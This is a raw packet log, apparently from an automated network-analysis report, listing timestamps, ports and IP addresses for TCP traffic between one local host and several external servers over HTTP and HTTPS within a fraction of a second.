Jul 2, 2024 00:05:08.670887947 CEST	49737	443	192.168.2.6	3.5.20.219
Jul 2, 2024 00:05:08.670902014 CEST	443	49737	3.5.20.219	192.168.2.6
Jul 2, 2024 00:05:08.671165943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671175957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671185017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671195984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671205997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671216965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671225071 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671241999 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671267033 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671293020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671303988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671314001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671324968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671335936 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671350002 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671382904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671581030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671592951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671602964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671612978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671624899 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671634912 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671638966 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671647072 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671658039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671658993 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671669960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.671680927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671684027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671684027 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671693087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671736002 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.671755075 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671755075 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671900988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671911001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671921968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671931982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671941996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671952963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671962976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671969891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671969891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671974897 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671986103 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.671996117 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.671997070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672008038 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672018051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672018051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672023058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672040939 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672043085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672053099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672063112 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672074080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672081947 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672084093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672095060 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672106028 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672116041 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672127008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672137022 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672144890 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672144890 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672146082 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672153950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672224045 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672224045 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672224045 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672565937 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672576904 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672588110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672597885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672609091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672620058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672629118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672640085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672640085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672640085 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672650099 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672653913 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672660112 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672671080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672679901 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672686100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672689915 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672698021 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672708035 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672719002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672720909 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672729015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672739983 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672749996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.672758102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672758102 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672760963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672775984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672776937 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672786951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672796011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672806978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672816992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672827005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672828913 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.672828913 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.672833920 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.672838926 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672849894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672858953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672868967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.672868967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.672868967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672880888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672893047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.672893047 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.672925949 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.672925949 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673499107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673511982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673521996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673535109 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673546076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673557043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673567057 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673577070 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673577070 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673577070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673588991 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673599958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673608065 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673609018 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673609018 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673615932 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673626900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.673636913 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673645973 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673650026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673650026 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673659086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673675060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673685074 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673691034 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.673695087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673695087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673696041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673707962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673718929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673728943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673736095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673736095 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673741102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673752069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673760891 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673763990 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673775911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673787117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.673794985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673815966 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.673845053 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674348116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674365044 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674376011 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674386024 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674396992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674407005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674422026 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674423933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674423933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674433947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674446106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674455881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674465895 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674472094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674472094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674479961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674490929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674499989 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674503088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674506903 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674536943 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674560070 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674603939 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674614906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674626112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674637079 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674658060 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674684048 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674746037 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674757957 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674767971 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674777985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674787998 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674798965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674808979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674814939 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674814939 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674819946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674833059 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674841881 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674844980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.674875975 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.674897909 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675081968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675095081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675106049 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675151110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675189018 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675263882 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675276041 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675286055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675297976 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675322056 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675357103 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675414085 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675426006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675436020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675447941 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675457954 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675467968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675478935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.675481081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675481081 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675502062 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.675528049 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676062107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676074028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676141024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676167965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676178932 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676188946 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676222086 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676259041 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676333904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676346064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676356077 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676366091 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676382065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676398993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676409006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676414013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676414013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676423073 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676441908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676443100 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676443100 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676486015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676486015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.676902056 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.676961899 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.677014112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677026033 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677103996 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.677145958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677158117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677167892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677180052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677191019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677198887 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.677212954 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.677212954 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.677248001 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.678895950 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.679111958 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.679177999 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.679192066 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.682312965 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.682322025 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.682420015 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682455063 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682461023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682483912 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.682485104 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682501078 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682502031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682557106 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682559967 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682568073 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682624102 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682629108 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682630062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682636023 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682687044 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682687044 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682694912 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682701111 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682710886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682760000 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682760000 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682771921 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682777882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682785034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682807922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682846069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682846069 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.682900906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.682959080 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.683015108 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683021069 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683032036 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683037996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683043003 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683048964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683065891 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.683085918 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.683085918 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.683120012 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.690119028 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.690330029 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.690412045 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.690423012 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.690632105 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690675974 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690682888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690699100 CEST	49730	443	192.168.2.6	188.114.96.3
Jul 2, 2024 00:05:08.690722942 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.690733910 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.690749884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690757036 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690768003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690773964 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690778971 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.690815926 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.690815926 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.695815086 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.695822954 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.695828915 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.695878983 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.696026087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696033001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.696038961 CEST	80	49716	77.105.133.27	192.168.2.6
